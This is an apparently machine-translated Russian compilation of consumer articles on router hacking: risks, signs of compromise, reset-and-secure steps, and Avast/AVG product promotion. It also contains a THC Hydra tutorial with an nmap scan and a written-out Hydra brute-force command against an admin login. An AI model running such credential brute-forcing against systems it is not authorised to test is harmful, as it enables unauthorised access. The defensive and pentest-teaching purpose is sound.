Если злоумышленник проник в маршрутизатор — либо из-за того, что пароль можно было угадать, либо из-за того, что он не был настроен так, чтобы его запрашивать, либо из-за того, что он воспользовался уязвимостью до авторизации, — тогда они могут многое сделать. Они могут включить внешнее (удаленное) управление, чтобы они могли войти в него, не подключаясь к вашей Wi-Fi, через ваше интернет-соединение. Они могут создать вторую сеть Wi-Fi (с того же маршрутизатора, с доступом к вашей локальной сети и Интернету) и надеяться, что вы этого не заметите.Они могли отключить его брандмауэр. Они потенциально могут даже настроить его на проксирование всего вашего интернет-трафика через свой компьютер в Интернете. Более того, это просто вещи, которые могут быть возможны из официального интерфейса администратора, но большинство домашних маршрутизаторов уязвимы для атак путем внедрения команд, позволяющих злоумышленнику запускать на них произвольные программы. Таким образом, злоумышленник может делать все, что угодно, в том числе устанавливать удаленно доступный черный ход в маршрутизаторе, перехватывать весь Интернет и локальный трафик в вашей сети, запускать атаки на другие устройства и т. Д.

Точно так же, в зависимости от того, насколько безопасны другие ваши устройства в сети, злоумышленник потенциально мог нанести много другого вреда. Например, если на вашем ПК включен общий доступ к файлам, они потенциально могли прочитать любые файлы, которыми вы поделились, и, возможно, перезаписать их; если бы они могли перезаписать исполняемый файл, то теперь на вашем ПК мог бы работать произвольный код.

Кроме того, они теоретически могли причинить вам вред, злоупотребляя вашим интернет-соединением.Например, загрузка пиратских носителей (им все равно, если на вас подадут в суд или ваш интернет-провайдер прервет ваше соединение) или даже совершение криминальных действий, таких как запуск атак на другие сайты, продажа детской порнографии или тому подобное (им все равно, если вы получите арестованы, для них это просто прикрытие).

На самом деле , однако, они, вероятно, были просто кем-то, кто хотел получить доступ в Интернет для, в худшем случае, просмотра порно, которое они не хотят, чтобы их отец видел в их собственных журналах маршрутизатора или что-то в этом роде. Они могли заметить любые другие устройства, которые рекламировали общие файловые ресурсы или что-то подобное, возможно, даже попробовали несколько очевидных паролей (например, «такой же, как пароль WiFi»; никогда не повторно использовали пароли), но вероятность того, что они действительно попытаются оставлять бэкдоры или совершать другие преступления довольно низко.

Как исправить взломанный маршрутизатор и защитить свой Wi-Fi

В чем опасность взлома роутера?

Опасность взлома маршрутизатора заключается в том, что он может инициировать целый ряд новых угроз, от кажущихся безобидными до гораздо более серьезных.При таком уровне доступа взломавший ваш маршрутизатор может:

Увеличьте пропускную способность: Это скорее раздражает, чем вредно, но все же — если у вас есть кто-то, подключающийся к вашему Wi-Fi и использующий его для потоковой передачи игр и фильмов (или даже для добычи криптовалюты), у вас будет гораздо меньше пропускной способности осталось для вашей собственной деятельности.
Шпионить за вашим интернет-трафиком: Кто-то, подключившийся к вашей сети Wi-Fi, может шпионить за всем трафиком в вашей сети с любого подключенного к ней устройства.Сюда входят ваш компьютер, телефон, семейные компьютеры и телефоны, игровая консоль, умные домашние устройства и многое другое. Хакеры также могут использовать анализатор пакетов для отслеживания вашего интернет-трафика в режиме реального времени и захвата входящих и исходящих данных.
Доступ к незаконному контенту: Вы можете вести безупречную интернет-историю, но это не значит, что ваш хакер Wi-Fi делает это. Они могут использовать ваше интернет-соединение для просмотра или загрузки нелегальных медиафайлов, потоковой передачи или загрузки пиратского контента, покупок в темной сети и множества других неприятных вещей — и все это под вашим именем.
Соберите ваши личные данные: Хакер маршрутизатора может перехватить все, что вы вводите на веб-сайт с незашифрованным соединением — то есть веб-сайт, который использует только HTTP. И это касается всех, кто подключен к вашему взломанному Wi-Fi. Никогда не вводите конфиденциальные данные, такие как пароль, на веб-сайт без шифрования HTTPS.
Установите вредоносное ПО: Ага, есть вредоносное ПО для маршрутизатора. Хакер, имеющий доступ к вашему маршрутизатору, может инициировать взлом прошивки маршрутизатора, загрузив ваш маршрутизатор вредоносным ПО, что подготовит почву для дополнительных атак и шпионажа в будущем.
Сопоставьте свою сеть Wi-Fi: Кто-то, подключившийся к вашему маршрутизатору, может видеть все устройства в вашей сети и использовать эту информацию для планирования дополнительных атак. Атаки маршрутизаторов на умные дома и другие устройства Интернета вещей могут быть особенно опасными, поскольку многие люди не уделяют столько внимания безопасности своего Интернета вещей, сколько защите своего компьютера и телефона.
Атаковать других людей: Киберпреступники могут взломать ваш маршрутизатор и использовать его в рамках масштабной DDOS-атаки.
Измените настройки DNS: Общая цель взлома маршрутизатора Wi-Fi — получить доступ к настройкам DNS вашего маршрутизатора, которые определяют, куда он отправляет ваш интернет-трафик. Хакер может изменить настройки DNS вашего маршрутизатора, чтобы ваш интернет-трафик перенаправлялся на веб-сайты по их выбору — обычно это фарминговые веб-сайты, которые обманом заставляют вас передавать личную информацию, или вредоносные веб-сайты, которые загружают вредоносное ПО на ваши устройства.

При взломе маршрутизатора возникают различные угрозы безопасности.

Теперь, когда мы знаем, что могут сделать хакеры Wi-Fi после взлома маршрутизатора, давайте посмотрим, что вы можете сделать, чтобы это остановить.

Как защитить Wi-Fi от хакеров

Приняв всего несколько простых мер предосторожности с маршрутизатором Wi-Fi, вы можете значительно усложнить его взлом. Как и во многих случаях в жизни, предотвратить взлом Wi-Fi дешевле и проще, чем иметь дело со взломанным роутером. Как только это произойдет, решить вашу проблему станет значительно труднее, хотя и возможно.

Вот как заблокировать хакеров Wi-Fi с помощью интеллектуального маршрутизатора:

Измените учетные данные администратора маршрутизатора

У всех маршрутизаторов есть имя пользователя и пароль, которые используются для доступа к настройкам вашего маршрутизатора. Как только вы приобретаете маршрутизатор, новый или подержанный, сразу же меняет имя пользователя и пароль .

хакерам Wi-Fi известны учетные данные администратора по умолчанию, установленные производителем почти для всех популярных маршрутизаторов на рынке. Если кто-то может подключиться к вашей сети Wi-Fi, он может попробовать войти в ваш маршрутизатор с этой информацией.Если вы никогда не обновляли учетные данные для входа в систему после получения маршрутизатора, вы настраиваете себя как легкую мишень для взлома пароля маршрутизатора. А если вы купили маршрутизатор у кого-то другого, вы не можете быть уверены, у кого есть эти старые данные для входа. В любом случае, измените его как можно скорее.

Установите новый пароль маршрутизатора, используя методы создания надежных паролей — или создайте действительно невзламываемый пароль со случайными строками символов — чтобы не дать хакерам Wi-Fi легко взломать ваш маршрутизатор.

Включить шифрование WPA2 (или WPA3)

WPA2 и WPA3 — вторая и третья версии протокола безопасности защищенного доступа Wi-Fi — защищают ваш маршрутизатор от нежелательного доступа с помощью шифрования AES.Это тот же тип шифрования, который мы в Avast используем для нашей сверхзащищенной Avast SecureLine VPN, так что вы знаете, что это хорошо. Любой маршрутизатор, который стоит купить, будет поддерживать WPA2, а некоторые новые модели могут поддерживать WPA3.

Включите шифрование WPA2 или WPA3, чтобы любому, кто хочет подключиться к вашему защищенному маршрутизатору, понадобился ваш пароль Wi-Fi. И обязательно установите надежный пароль, следуя привычкам умного создания паролей. Эти простые шаги бросят серьезный вызов любому потенциальному хакеру Wi-Fi.

Измените сетевое имя маршрутизатора (SSID)

Во время настройки маршрутизатора — изменения учетных данных администратора и установки надежного пароля — также измените SSID.SSID означает идентификатор набора услуг , который в повседневном понимании является именем вашей сети Wi-Fi.

Новые маршрутизаторы часто отображают марку маршрутизатора в SSID, и хакеры Wi-Fi могут использовать эту информацию, чтобы помочь им взломать ваш пароль. Вместо этого задайте собственное имя сети , чтобы они не знали, какой у вас тип маршрутизатора. Чем больше улик вы дадите хакеру, тем легче ему будет работать.

Проявите творческий подход к названию своей сети Wi-Fi: сделайте его длинным и сложным.Шифрование WPA использует SSID как часть алгоритма, поэтому, избегая стандартных или общих сетевых имен, вы сделаете свою сеть более устойчивой к таким методам взлома паролей, как радужные таблицы. Кроме того, приятно дать соседям повод посмеяться.

Отключить WPS

Наряду с WPA2 или WPA3, многие маршрутизаторы также имеют WPS (защищенная настройка Wi-Fi) — это означает, что вы можете нажать кнопку или ввести PIN-код для подключения, а не использовать пароль. Хотя это явно более удобно, уровень безопасности резко падает при использовании кнопок или PIN-кодов вместо паролей.

Любой, кто может физически прикоснуться к вашему маршрутизатору, сможет нажать кнопку WPS и подключиться. А короткий ПИН-код гораздо легче взломать с помощью грубой силы, чем длинный и сложный пароль.

К сожалению, не все маршрутизаторы поддерживают отключение функций WPS, но если у вас это есть, отключите WPS как можно скорее и установите пароль.

Отключить беспроводное / удаленное администрирование

Удаленное администрирование позволяет вам войти в настройки администратора вашего маршрутизатора из любой точки мира.Но если вы не разработчик, шансы, что вам когда-нибудь понадобится это сделать, невелики. Если вы отключите эту функцию, вы сможете получить доступ к настройкам, только если ваш компьютер физически подключен к маршрутизатору с помощью кабеля Ethernet. Отключение удаленного администрирования — удобный способ защитить вас от хакеров.

Обновите прошивку роутера.

Прошивка — это название программного обеспечения, которое управляет определенным аппаратным обеспечением — в данном случае вашим маршрутизатором. Как и операционная система вашего компьютера или любые программы и приложения, которые вы используете, прошивку можно обновлять.

Обновления прошивки

могут защитить ваш маршрутизатор от любых уязвимостей, которые могут быть обнаружены в более старых версиях прошивки. Некоторые маршрутизаторы могут проверять наличие обновлений микропрограмм, но вы всегда можете войти в настройки администратора вашего маршрутизатора, найти раздел микропрограмм и посмотреть сами.

Используйте инструмент кибербезопасности, который защищает вашу сеть Wi-Fi

Один из самых простых и безопасных способов защитить вашу сеть Wi-Fi — это использовать инструмент мониторинга Wi-Fi, который будет автоматически следить за вашей беспроводной сетью, избавляя вас от необходимости контролировать ее вручную.В Avast Free Antivirus есть встроенный инспектор Wi-Fi, который постоянно сканирует вашу сеть на предмет любых подозрительных действий или устройств, поэтому вы всегда будете точно знать, что происходит в вашем Wi-Fi.

Защитить вашу сеть Wi-Fi легко с помощью нашего встроенного инструмента Wi-Fi Inspector

Защитите свою сеть Wi-Fi и избавьтесь от любых чужих устройств с помощью комплексной домашней кибербезопасности. Загрузите Avast Free Antivirus сейчас и почувствуйте себя комфортно, зная, что если в вашей сети есть коварные хакеры Wi-Fi, вы узнаете об этом первым.

Был ли взломан мой роутер?

Надеюсь, вы уже следовали приведенному выше совету, и ваш маршрутизатор Wi-Fi защищен от взлома и останется без него. Но если вы испытываете подозрение или беспокойство по поводу угрозы взлома маршрутизатора Wi-Fi, вот некоторые признаки взлома маршрутизатора, на которые следует обратить внимание.

Ваш Интернет внезапно стал намного медленнее. Это может быть вызвано любым количеством причин, поэтому, если вы не видите никаких других симптомов в этом списке, вам не нужно беспокоиться.Но медленный интернет может быть вызван из-за того, что хакер Wi-Fi поглощает всю вашу пропускную способность.

На вашем роутере есть неизвестные устройства. Если вы используете инструмент безопасности сети Wi-Fi, например Avast Free Antivirus, вы автоматически узнаете, подключается ли к вашей сети странное устройство и когда это происходит. В противном случае вам нужно будет войти в свой маршрутизатор и просмотреть список IP-адресов в вашей сети. Сравните этот список с IP-адресами ваших собственных устройств — вот как найти ваш IP-адрес — чтобы увидеть, есть ли там что-нибудь, что не принадлежит.

Ваши настройки DNS были изменены. Ваш маршрутизатор, скорее всего, подключается к DNS-серверу, предоставленному вашим интернет-провайдером, но хакер может изменить настройки DNS вашего маршрутизатора, чтобы вместо этого он использовал вредоносный сервер. Это может привести к тому, что ваш веб-трафик будет перенаправлен на опасные веб-сайты, которые могут украсть ваши личные данные или загрузить вредоносное ПО на ваше устройство. Вы можете проверить настройки DNS вашего маршрутизатора в меню администратора вашего маршрутизатора.

Ваш пароль маршрутизатора или учетные данные администратора были изменены. Хакер, который не пытается оставаться скрытым, может изменить пароль вашего маршрутизатора, что помешает вам подключиться и использовать интернет-услуги, за которые вы платите. Они также могут заблокировать вас от серверной части вашего маршрутизатора, изменив ваши учетные данные администратора.

На ваших устройствах установлено незнакомое программное обеспечение (или вредоносное ПО). Это большой красный флаг. Хакер, имеющий доступ к вашему маршрутизатору, может заразить ваши устройства всевозможными вредоносными программами, включая программы-вымогатели.

Если у вас возникла одна или несколько из этих проблем, прочтите, чтобы узнать, как остановить хакеров от использования вашего Wi-Fi, чтобы вы могли восстановить контроль над маршрутизатором.

Как починить взломанный роутер

Если вы имеете дело со взломом маршрутизатора, хорошая новость заключается в том, что вы, вероятно, сможете восстановить контроль. Следуя простой процедуре, описанной ниже, вы сможете изгнать любых захватчиков маршрутизатора и убедиться, что они останутся в стороне в будущем.

Еще одна хорошая новость: если ваш маршрутизатор заражен вредоносным ПО, эта процедура может также удалить вредоносное ПО маршрутизатора.

1. Отключите роутер

Вы захотите изолировать свой маршрутизатор на время устранения взлома маршрутизатора.Первым делом отключите все интернет-кабели от роутера. Это немедленно приводит к разрыву соединения между хакером и любым устройством в вашей домашней сети Wi-Fi. Если какие-либо устройства физически подключены к вашему маршрутизатору, отключите и их.

2. Сбросьте настройки роутера

Затем сбросьте маршрутизатор до заводских настроек по умолчанию. Обратите внимание, что это , а не , когда вы выключаете маршрутизатор, а затем снова включаете его, чтобы попытаться исправить медленное подключение к Интернету.

Сброс заводских настроек стирает ваш маршрутизатор, включая все настройки сети, которые вы настроили. Если у хакера есть ваш пароль администратора, он больше не сможет использовать его после сброса. Перезагрузка маршрутизатора также может удалить некоторые типы вредоносных программ маршрутизатора, в том числе пресловутый VPNFilter.

У большинства маршрутизаторов есть специальная кнопка возврата к заводским настройкам. Вам может понадобиться скрепка, чтобы прижать его. Если вы не можете понять, как восстановить заводские настройки маршрутизатора, обратитесь к руководству пользователя или на веб-сайте производителя.

3. Войдите в свой маршрутизатор и измените учетные данные администратора.

Теперь, когда вы вернули маршрутизатор к заводским настройкам по умолчанию, вы можете войти в систему с его именем пользователя и паролем по умолчанию. Вы найдете эту информацию на самом маршрутизаторе, в руководстве пользователя или на веб-сайте производителя.

После входа в систему измените пароль администратора на любой по своему усмотрению. Это предотвратит повторный вход хакера в систему.

4. Установите новый SSID сети Wi-Fi и пароль

Дайте своей беспроводной сети новое блестящее имя и помните, что более длинные и сложные имена затрудняют взлом сети.То же самое и с вашим паролем — стремитесь к минимуму 15 символов и используйте комбинацию букв, цифр и символов (или используйте этот инструмент для создания непонятных, случайных паролей).

5. Настройте гостевую сеть (необязательно)

Пока вы все еще возитесь с настройками маршрутизатора, подумайте о настройке гостевой сети Wi-Fi на маршрутизаторе. Это дополнительная сеть, которая позволяет подключенным к ней устройствам получать доступ к Интернету, но не позволяет им попасть в вашу основную сеть. Таким образом, зараженный вредоносным ПО телефон вашего друга не сможет поставить под угрозу ваш новый компьютер.

Если у вас много интеллектуальных устройств, вы также можете направлять их через гостевую сеть. Устройства IoT обычно не обладают высочайшей безопасностью, поэтому изолировать их в отдельной сети — хорошая идея.

6. Обновите прошивку роутера

Большинство маршрутизаторов не обновляют микропрограмму автоматически, поэтому вам придется делать это самостоятельно, пока вы вошли в систему. Найдите настройки микропрограммы в меню администратора вашего маршрутизатора и обновите ее до последней версии. Любые хакерские эксплойты, нацеленные на вашу старую прошивку, должны стать неэффективными для нового обновления.

Защитите свою сеть с помощью надежной кибербезопасности

Используйте надежный антивирус, например Avast Free Antivirus, для сканирования вашего компьютера на наличие вредоносных программ. Вы хотите обнаружить любое вредоносное ПО, которое хакер мог внедрить в ваш компьютер. Avast Free Antivirus тщательно просканирует ваш компьютер, чтобы обнаружить и удалить любые следы вредоносных программ, независимо от того, насколько они скрыты.

Затем используйте встроенный инструмент Wi-Fi Inspector, чтобы проверить обновленную беспроводную сеть на наличие уязвимостей или злоумышленников.Если вы сбросили свой маршрутизатор и выбрали пароли, которые трудно взломать, вы должны быть в безопасности.

Защитите свой компьютер и маршрутизатор от угроз с помощью Avast Free Antivirus, решения для кибербезопасности, которому доверяют миллионы людей в миллионах домов по всему миру.

THC Hydra: взлом пароля администратора маршрутизатора Версия

Что такое THC Hydra?

THC Hydra — это инструмент для взлома паролей, который поддерживает широкий спектр сетевых протоколов, таких как FTP, LDAP, большинство методов HTTP, таких как GET и POST, базы данных, такие как MySQL, и многое другое.Эти функции делают его удобным инструментом для тестирования проникновения в сеть. Когда дело доходит до атак методом перебора учетных данных, Hydra является одним из наиболее широко используемых инструментов. В этом посте будет продемонстрировано использование Hydra и какие команды необходимо использовать для этого.

В комплект Hydra входят два инструмента —

Hydra — взломщик быстрого входа в сеть
Pw-Inspector — считывает пароли и распечатывает те, которые соответствуют требованиям

Hydra может использоваться для перебора паролей сетевых маршрутизаторов и других служб.С помощью подходящих списков слов Hydra может взламывать пароли широкого спектра сетевых маршрутизаторов и устройств.

Шаги по взлому пароля с помощью THC Hydra

Взлом паролей стал намного проще, поскольку такое большое количество сетевых устройств в Интернете и в корпоративных сетях настроено с использованием имен пользователей и паролей по умолчанию или со слабыми учетными данными просто для удобства. Это плохая практика, которая делает Hydra очень полезной для поиска таких уязвимостей во время пентеста.Hydra используется для взлома паролей FTP-серверов в этом руководстве, но можно взломать пароли сетевых маршрутизаторов и различных сетевых устройств, используя аналогичный процесс.

Здесь стоит отметить, что хороший список слов является обязательным условием успешного подбора пароля. Часто пароли по умолчанию меняются, поэтому рекомендуется обновлять их с помощью таких ресурсов, как репозиторий SecLists.

Совет: Чтобы получить обзор всех команд, параметров и флагов, которые можно использовать с этим инструментом, используйте команду man hydra, чтобы прочитать страницу руководства Hydra.

Сначала просканируйте порты целевой сети с помощью сканера портов, такого как Masscan, который имеет лучшую производительность и быстрее, если целевая инфраструктура большая, или Nmap.
Запускаем терминал для ввода команд.
Для этого урока воспользуемся Nmap. Используйте команду Nmap — Nmap 192.168.1.1, заменив заданный IP-адрес на IP-адрес целевого (FTP-сервера).
После завершения сканирования Nmap обратите внимание на открытые порты и службы, запущенные на хосте.В этом случае служба (порт) FTP открыта.
Запустите команду Hydra для перебора учетных данных этого FTP-сервера — Hydra -l admin -P password.txt -v -f 192.168.1.1 FTP

Объяснение приведенной выше команды:

Флаг -l используется для указания имени пользователя для входа. В этом случае используется имя пользователя admin , одно из имен пользователей по умолчанию, обычно используемых на серверах и сетевых устройствах.Однако, если это не так, используйте вместо этого флаг -L в команде и укажите список слов, состоящий из часто используемых имен пользователей, когда единственный вариант — угадать имя пользователя.
Укажите список слов пароля с помощью флага -P команды.
Флаг -v является необязательным для подробного режима . Этот флаг выводит попытки входа в систему.
Укажите IP-адрес атакуемой цели, в данном случае это IP-адрес — 192.168.1.1
Наконец, укажите службу, порт которой открыт.В данном случае это служба FTP (другие службы — это HTTP-get и т. Д.)

Этот процесс должен занять некоторое время, поскольку Hydra перебирает указанные комбинации имени пользователя и пароля из указанных списков слов и пытается войти в систему. Если Hydra обнаруживает успешный вход в систему, она выводит обнаруженные учетные данные на терминал.

Примечание: Иногда может быть ограничение скорости для целевой службы, чтобы предотвратить атаки грубой силы, ведущие к блокировке учетной записи; таким образом, атака не удалась.

Как упоминалось ранее, Hydra поддерживает различные сетевые устройства, службы и протоколы, и, следовательно, ее можно использовать для взлома практически любого типа пароля. Это может быть полезно как для внутренних, так и для внешних тестов на проникновение в сеть.

Чтобы читать больше бесплатных статей, зарегистрируйтесь в Cybrary, нажав кнопку «Зарегистрироваться» в правом верхнем углу. Запишитесь на курс сетевого инженера, чтобы узнать больше о сетевой безопасности и получить дополнительные навыки.

Ссылка: https: // tools.kali.org/password-attacks/hydra

Взлом маршрутизатора: что это такое и как его предотвратить

Если у вас не установлен надежный пароль маршрутизатора , хакер сможет проникнуть внутрь вашего маршрутизатора за считанные минуты. Получив контроль, хакер может изменить настройки вашего роутера, получить доступ к вашим интернет-данным или даже установить вредоносное ПО на ваш роутер. Все это отличительные признаки того, что вас ударил хакер в черной шляпе, в отличие от его более альтруистических кузенов в белой шляпе.

Как работает взлом роутера

В зависимости от того, какой у вас роутер и насколько хорошо вы его защитили, начинающие хакеры Wi-Fi могут попробовать один из нескольких методов атаки, чтобы взломать ваш роутер.

Использование учетных данных по умолчанию: Это самый простой способ взломать чей-то маршрутизатор. Если вы никогда не меняли пароль администратора своего маршрутизатора, любой может просто войти в систему, указав эту информацию. Хакерам маршрутизаторов известны стандартные пароли для самых популярных маршрутизаторов, и они с радостью опробуют их в вашей сети Wi-Fi.

Использование уязвимости прошивки: Прошивка — это название встроенного программного обеспечения, которое сообщает аппаратному устройству, например маршрутизатору, как оно должно работать. Уязвимости программного обеспечения — это недостатки безопасности, которые хакеры могут использовать в своих атаках. Если в прошивке вашего маршрутизатора есть уязвимость, хакер может использовать ее для доступа к административным настройкам вашего маршрутизатора. Регулярно проверяйте веб-сайт производителя маршрутизатора на наличие обновлений прошивки и устанавливайте все, что найдете.

Взлом пароля: Смена пароля маршрутизатора может оказаться недостаточной для защиты от хакеров.Пробуя один пароль за другим, хакеры могут угадывать, пока не найдут ваш пароль. Чем проще ваш пароль, тем проще это становится, поэтому всегда создавайте надежные и уникальные пароли для всех ваших устройств и учетных записей.

Все еще не знаете, можно ли взломать роутер? При наличии достаточного времени и ресурсов любое устройство может быть взломано . Вот почему эффективная интернет-безопасность означает, что взлом должен быть максимально сложным и трудоемким.

Зачем кому-то взламывать мой роутер?

Даже если вы не думаете, что на вашем компьютере есть что-то стоящее, хакер Wi-Fi может не согласиться.Кража данных — лишь одна из многих причин, по которым кто-то может захотеть взломать ваше соединение Wi-Fi. Кто-то, у кого есть доступ к вашему роутеру, может:

Подслушивать вас: Поскольку ваш маршрутизатор обрабатывает весь интернет-трафик в вашей сети, хакер может видеть, что вы делаете — какие веб-сайты и службы вы используете, когда вы их используете и многое другое. Это распространяется на любое устройство в вашей сети Wi-Fi.
Отслеживание HTTP-соединений: Когда вы подключаетесь к веб-сайту, который не использует шифрование HTTPS, это соединение широко открыто.Хакер в вашем маршрутизаторе может видеть все, что вы делаете на этих веб-сайтах, включая личные данные, которые вы отправляете или получаете. С помощью анализатора пакетов хакер может отслеживать весь интернет-трафик в вашей сети и даже захватывать данные для собственного использования.
Вмешательство в HTTP-соединения: Хакеры могут внедрить вредоносный код в незащищенные HTTP-соединения (часто встречающиеся на небезопасных веб-сайтах), чтобы заразить устройства в вашей сети или заставить их добывать криптовалюту.
Установка вредоносного ПО на маршрутизатор: Взлом маршрутизатора может быть первым шагом в более сложной атаке.После взлома вашего маршрутизатора хакер может разместить на нем вредоносное ПО — например, анализатор пакетов, о котором мы только что говорили, — и продолжить свои кибератаки.
Обнаружение и атака устройств в вашей сети: Хакер маршрутизатора может использовать ваш маршрутизатор в качестве плацдарма для взлома других устройств, подключенных к вашей сети. Любое устройство, которое подключается к вашему роутеру, может оказаться под угрозой.
Перенаправьте ваш интернет-трафик: Настройки DNS вашего маршрутизатора направляют ваш интернет-трафик в нужные места.Изменяя настройки DNS, хакер-маршрутизатор может перенаправлять ваш трафик на уровне DNS куда угодно — обычно на вредоносные веб-сайты, которые они контролируют и которые они могут использовать для обмана вас с помощью фарминговых атак или загрузки вредоносного ПО на ваше устройство.
Используйте ваше интернет-соединение: Хакер внутри вашей сети может бесплатно воспользоваться вашим интернет-соединением, переборщив вашу полосу пропускания и снизив скорость вашего интернета. Они могут даже использовать ваш Wi-Fi для доступа или обмена незаконным контентом от вашего имени.
Добавьте свой маршрутизатор в ботнет: Ботнеты — это огромные сети взломанных устройств, контролируемые киберпреступником. Хакеры часто используют ботнеты в крупномасштабных кибератаках, которые заваливают цели данными, чтобы остановить их.
Для этих распределенных атак типа «отказ в обслуживании» (DDoS) требуются огромные бот-сети, но последствия могут быть катастрофическими. Ботнеты также используются для рассылки спама или сканирования Интернета в поисках других уязвимых маршрутизаторов. Некоторые из самых известных хакеров в мире нацелены на обычных пользователей компьютеров для создания крупномасштабных ботнетов.

Хакер может навлечь на себя множество неприятностей, взломав ваш роутер.

Хакеры могут многое сделать, если получат доступ к вашему роутеру.

Был ли взломан мой роутер? Общие признаки

Теперь, когда вы знаете, почему кто-то может взломать ваш маршрутизатор, как выглядит взлом маршрутизатора? Эти признаки взлома маршрутизатора могут предупредить вас об опасности, пока не стало слишком поздно.

Измененные настройки DNS: Как упоминалось выше, одной из наиболее частых причин взлома маршрутизаторов является изменение настроек DNS.Поступая таким образом, хакер может перенаправить ваш интернет-трафик без вашего ведома, создавая потенциально разрушительную фарминговую атаку — это и есть перехват DNS. Настройки DNS вашего роутера доступны в его меню администратора.
Пароль администратора не работает: Злоумышленник мог проникнуть в систему и изменить ваши учетные данные администратора. В этом случае немедленно выполните сброс настроек маршрутизатора до заводских, а затем установите новый пароль.
Медленный Интернет: Медленный Интернет не всегда указывает на взлом Wi-Fi, но может.Если ваш Интернет внезапно стал намного медленнее, чем был раньше — и вы замечаете другие распространенные признаки взлома маршрутизатора, — это может быть связано с хакером, нарушающим вашу пропускную способность.
Странное программное обеспечение или вредоносное ПО на ваших устройствах: Помимо размещения его непосредственно на маршрутизаторе, хакер может также загрузить вредоносное ПО на ваш компьютер или телефон. Взлом маршрутизатора — не единственный способ распространения вредоносного ПО, но наряду с другими симптомами, перечисленными здесь, вредоносное ПО может указывать на взлом маршрутизатора.
Всегда защищайте свои устройства, используя лучшее программное обеспечение безопасности от известных брендов.
Бонусный совет — не пропустите для нераспознанных устройств в вашей сети: AVG AntiVirus FREE может определить, когда незнакомые устройства подключаются к вашей сети Wi-Fi. Когда это произойдет, вы увидите предупреждение, потому что если это произойдет, это может означать, что кто-то нашел ваш пароль Wi-Fi.
Хотя это еще не означает, что маршрутизатор взломал , а , кто-то, у кого есть доступ к вашей сети Wi-Fi, может позже взломать ваш маршрутизатор.Вот почему так важно контролировать свою домашнюю сеть с помощью надежного программного обеспечения для обеспечения безопасности.

AVG AntiVirus FREE — это полнофункциональный инструмент для обеспечения кибербезопасности, обеспечивающий безопасность вас и ваших устройств в Интернете. Сканируйте и блокируйте вредоносное ПО с помощью функции обнаружения в режиме 24/7, удаляйте вредоносные программы с вашего ПК, защищайте ценные файлы от программ-вымогателей, защищайтесь от фишинговых атак и не позволяйте хакерам маршрутизатора проникать в вашу сеть Wi-Fi.

Что делать со взломанным роутером

Как вы думаете, ваш роутер может быть взломан? Хорошая новость: в большинстве случаев исправить легко .Вот как исправить взломанный маршрутизатор и удалить вредоносное ПО за шесть простых шагов.

1. Отключите роутер от интернета и других устройств

Поместить этот маршрутизатор в карантин STAT! Отсоедините интернет-кабель и отсоедините все остальные кабели, идущие между вашим маршрутизатором и другими устройствами. Но оставьте свой маршрутизатор включенным, потому что он нуждается в источнике питания.

2. Выполните сброс настроек до заводских.

Когда ваш роутер отключен от интернета, сбросил настройки до заводских. Это выходит за рамки обычного переключателя «Выкл. / Вкл.», Который вы используете при отключении интернета. Сброс к заводским настройкам удаляет все ваши конфигурации и возвращает настройки маршрутизатора в состояние, подобное новому. Некоторые типы вредоносных программ для маршрутизаторов, такие как VPNFilter, также будут удалены после восстановления заводских настроек.

Для получения конкретных инструкций о том, как сбросить настройки маршрутизатора, обратитесь к руководству пользователя. Многие маршрутизаторы имеют небольшую утопленную кнопку сброса, которую нужно нажимать с помощью скрепки.

3. Войдите и измените пароль администратора.

После восстановления заводских настроек вы можете войти в свой маршрутизатор с его учетными данными администратора по умолчанию.Вы найдете их на самом роутере или в руководстве пользователя. После входа в систему немедленно измените пароль администратора на что-то длинное, уникальное и сложное. Таким образом, ваш хакер-хакер не сможет снова войти в систему, если попробует ваш старый пароль.

4. Создайте новый SSID и пароль для своей сети Wi-Fi

SSID (идентификатор набора услуг) — это имя вашей сети Wi-Fi. Ваш маршрутизатор может включать свою торговую марку в SSID по умолчанию, что является большим подспорьем для потенциального хакера.Знание типа вашего роутера может облегчить его взлом.

Установите новый SSID вместо и сделайте длинным и сложным . Шифрование WPA, которое ваш маршрутизатор использует для защиты вашего пароля, включает SSID в алгоритм шифрования. Из-за того, как работает это шифрование, более короткие или более распространенные сетевые имена может быть легче взломать с помощью радужной таблицы или другого вспомогательного средства.

Примените эти правила и к своему паролю. — всегда лучше, чем длинный, сложный и уникальный.Создайте пароль, содержащий от 15 до 20 символов. Вы не ошибетесь, выбрав более длинный пароль.

5. Создайте гостевую сеть (если хотите)

Гостевые сети — это отдельные сети на вашем маршрутизаторе, которые предоставляют доступ в Интернет для устройств, которые вы не хотите подключаться к основной сети. Они отлично подходят, когда к вам приходят гости, потому что никогда не знаешь, у кого на телефоне есть вредоносное ПО.

Изолируйте незнакомые устройства в гостевой сети , чтобы они не могли напрямую связываться с вашими собственными данными (и, возможно, заразить их).

Гостевые сети также идеально подходят для менее защищенных интеллектуальных устройств, которые часто имеют более слабую защиту, чем компьютеры и телефоны. Вы найдете параметры гостевой сети в настройках роутера.

6. Обновите прошивку на роутере

Если ваш роутер не обновляет прошивку автоматически — а многие этого не делают — вам придется сделать это самостоятельно. Зайдите на сайт производителя вашего маршрутизатора и найдите его раздел «Загрузки». Здесь вы должны найти выбор прошивки маршрутизатора.

Загрузите и установите последнюю версию встроенного ПО для маршрутизатора , чтобы устранить все уязвимости встроенного ПО и предотвратить их использование хакерами.

Вы также можете найти настройки прошивки вашего маршрутизатора, войдя в меню администратора, но вы можете получить неточные указания там. Некоторые маршрутизаторы сообщат вам, что их прошивка обновлена, хотя на самом деле она слишком устарела.

Если вы не можете обновить прошивку до более безопасной версии, получите новый маршрутизатор вместо — желательно от другого производителя, который не собирается подвергать вас хакерским атакам.

Как предотвратить взлом роутера

Чтобы избежать большинства взломов маршрутизаторов, достаточно всего нескольких простых изменений в вашем цифровом образе жизни. И предотвратить взлом маршрутизатора намного проще, чем бороться с последствиями взлома.

Узнайте, как заблокировать хакеров Wi-Fi, воспользовавшись этими полезными советами для большей защиты маршрутизатора:

Создайте новое имя пользователя и пароль администратора для вашего маршрутизатора

Как только вы приобретете новый маршрутизатор, установит новый пароль администратора .Хакерам известны пароли по умолчанию для всех популярных маршрутизаторов, и они могут опробовать их на вашем. Если вы купили маршрутизатор из вторых рук, не подпускайте бывших пользователей к нему, обновив пароль. И если можете, измените также имя администратора.

Следуйте правилам создания надежных паролей, чтобы никто не угадал ваш пароль. Длинный пароль от 15 до 20 символов очень сложно взломать.

